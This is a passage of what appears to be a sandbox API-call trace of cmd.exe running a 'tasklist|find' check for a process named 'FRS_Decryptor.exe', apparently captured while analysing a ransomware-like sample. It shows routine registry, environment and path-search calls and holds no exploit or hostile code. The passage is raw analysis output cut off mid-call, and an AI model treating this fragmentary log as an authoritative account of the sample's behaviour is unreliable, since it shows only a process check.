lpData=0x48eb00*=0x9, lpcbData=0x48eaf8*=0x4) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x0, lpData=0x48eb00*=0x9, lpcbData=0x48eaf8*=0x1000) returned 0x2 [0122.299] RegCloseKey (hKey=0x44) returned 0x0 [0122.299] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500a5 [0122.299] srand (_Seed=0x5aa500a5) [0122.299] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0122.299] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0122.299] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0122.299] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6640c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0122.300] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0122.300] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.300] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0122.300] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0122.300] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0122.300] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0122.300] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0122.300] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0122.300] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0122.300] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0122.300] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0122.300] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0122.300] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0122.300] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x48f8d4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0122.300] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x48f8d4, lpFilePart=0x48f8d0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x48f8d0*="Desktop") returned 0x1c [0122.300] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0122.300] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x48f650 | out: lpFindFileData=0x48f650) returned 0x6642d8 [0122.300] FindClose (in: hFindFile=0x6642d8 | out: hFindFile=0x6642d8) returned 1 [0122.300] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x48f650 | out: lpFindFileData=0x48f650) returned 0x6642d8 [0122.300] FindClose (in: hFindFile=0x6642d8 | out: hFindFile=0x6642d8) returned 1 [0122.300] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0122.301] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x48f650 | out: lpFindFileData=0x48f650) returned 0x6642d8 [0122.301] FindClose (in: hFindFile=0x6642d8 | out: hFindFile=0x6642d8) returned 1 [0122.301] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0122.301] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0122.301] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0122.301] GetEnvironmentStringsW () returned 0x666190* [0122.301] FreeEnvironmentStringsA (penv="=") returned 1 [0122.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0122.301] GetConsoleOutputCP () returned 0x1b5 [0122.301] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0122.301] GetUserDefaultLCID () returned 0x409 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x48fa00, cchData=128 | out: lpLCData="0") returned 2 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x48fa00, cchData=128 | out: lpLCData="0") returned 2 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x48fa00, cchData=128 | out: lpLCData="1") returned 2 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0122.302] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0122.302] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0122.303] GetConsoleTitleW (in: lpConsoleTitle=0x664e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0122.303] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0122.303] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0122.303] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0122.303] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0122.304] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0122.304] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0122.304] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0122.304] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0122.304] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0122.304] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0122.304] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0122.304] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0122.305] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0122.305] _wcsicmp (_String1="IF", _String2="find") returned 3 [0122.305] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0122.305] _wcsicmp (_String1="REM", _String2="find") returned 12 [0122.305] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0122.305] _pipe (in: _PtHandles=0x6651f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x6651f0) returned 0 [0122.306] _dup (_FileHandle=1) returned 5 [0122.306] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0122.306] _close (_FileHandle=4) returned 0 [0122.306] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0122.306] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0122.306] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0122.306] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0122.306] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0122.306] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0122.306] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0122.306] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0122.306] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0122.306] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0122.306] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0122.306] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0122.306] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0122.306] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0122.306] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0122.306] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0122.306] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0122.306] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0122.306] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0122.306] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0122.306] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0122.306] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0122.306] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0122.306] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0122.306] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0122.306] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0122.307] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0122.307] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0122.307] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0122.307] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0122.307] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0122.307] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0122.307] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0122.307] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0122.307] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0122.307] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0122.307] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0122.307] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0122.307] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0122.307] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0122.307] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0122.307] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0122.307] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0122.307] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0122.307] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0122.307] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0122.307] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0122.307] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0122.307] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0122.307] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0122.307] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0122.307] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0122.307] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0122.307] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0122.307] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0122.307] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0122.307] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0122.307] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0122.307] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0122.307] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0122.307] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0122.307] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0122.307] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0122.307] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0122.307] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0122.307] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0122.307] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0122.307] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0122.307] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0122.307] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0122.307] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0122.307] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0122.307] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0122.307] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0122.307] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0122.307] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0122.307] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0122.307] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0122.307] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0122.307] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0122.307] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0122.307] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0122.307] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0122.308] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0122.308] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0122.308] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0122.308] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0122.308] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0122.308] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0122.308] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0122.308] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0122.308] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0122.308] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0122.308] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0122.308] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0122.308] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0122.308] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0122.308] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0122.308] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0122.308] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0122.308] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0122.308] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0122.308] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0122.308] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0122.308] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0122.308] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0122.308] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0122.308] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0122.308] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0122.308] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0122.308] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0122.308] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0122.308] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0122.308] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0122.308] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0122.308] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0122.308] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0122.308] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0122.308] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0122.308] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0122.308] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0122.308] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0122.308] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0122.308] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0122.308] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0122.308] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0122.309] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0122.309] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0122.309] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0122.309] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0122.309] SetErrorMode (uMode=0x0) returned 0x0 [0122.309] SetErrorMode (uMode=0x1) returned 0x0 [0122.309] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x665228, lpFilePart=0x48f85c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x48f85c*="Desktop") returned 0x1c [0122.309] SetErrorMode (uMode=0x0) returned 0x1 [0122.309] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0122.309] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0122.313] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.313] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.313] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x48f5e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f5e8) returned 0xffffffff [0122.314] GetLastError () returned 0x2 [0122.314] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.314] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x48f5e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f5e8) returned 0x665530 [0122.314] FindClose (in: hFindFile=0x665530 | out: hFindFile=0x665530) returned 1 [0122.314] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x48f5e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f5e8) returned 0xffffffff [0122.314] GetLastError () returned 0x2 [0122.314] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x48f5e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f5e8) returned 0x665530 [0122.314] FindClose (in: hFindFile=0x665530 | out: hFindFile=0x665530) returned 1 [0122.314] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0122.314] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0122.314] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0122.314] SetErrorMode (uMode=0x0) returned 0x0 [0122.314] SetErrorMode (uMode=0x1) returned 0x0 [0122.314] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x66a3c0, lpFilePart=0x48f604 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x48f604*="Desktop") returned 0x1c [0122.314] SetErrorMode (uMode=0x0) returned 0x1 [0122.315] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0122.315] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0122.315] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.315] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.315] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x48f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f390) returned 0xffffffff [0122.315] GetLastError () returned 0x2 [0122.315] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.315] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x48f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f390) returned 0x665628 [0122.315] FindClose (in: hFindFile=0x665628 | out: hFindFile=0x665628) returned 1 [0122.315] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x48f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f390) returned 0xffffffff [0122.315] GetLastError () returned 0x2 [0122.315] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x48f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x48f390) returned 0x665628 [0122.315] FindClose (in: hFindFile=0x665628 | out: hFindFile=0x665628) returned 1 [0122.315] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0122.315] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0122.315] GetConsoleTitleW (in: lpConsoleTitle=0x48f88c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0122.316] InitializeProcThreadAttributeList (in: lpAttributeList=0x48f7b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x48f79c | out: lpAttributeList=0x48f7b8, lpSize=0x48f79c) returned 1 [0122.316] UpdateProcThreadAttribute (in: lpAttributeList=0x48f7b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x48f7a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x48f7b8, lpPreviousValue=0x0) returned 1 [0122.316] GetStartupInfoW (in: lpStartupInfo=0x48f7f0 | out: lpStartupInfo=0x48f7f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x318, hStdError=0x2c)) [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0122.316] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0122.317] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0122.318] CreateProcessW (in: 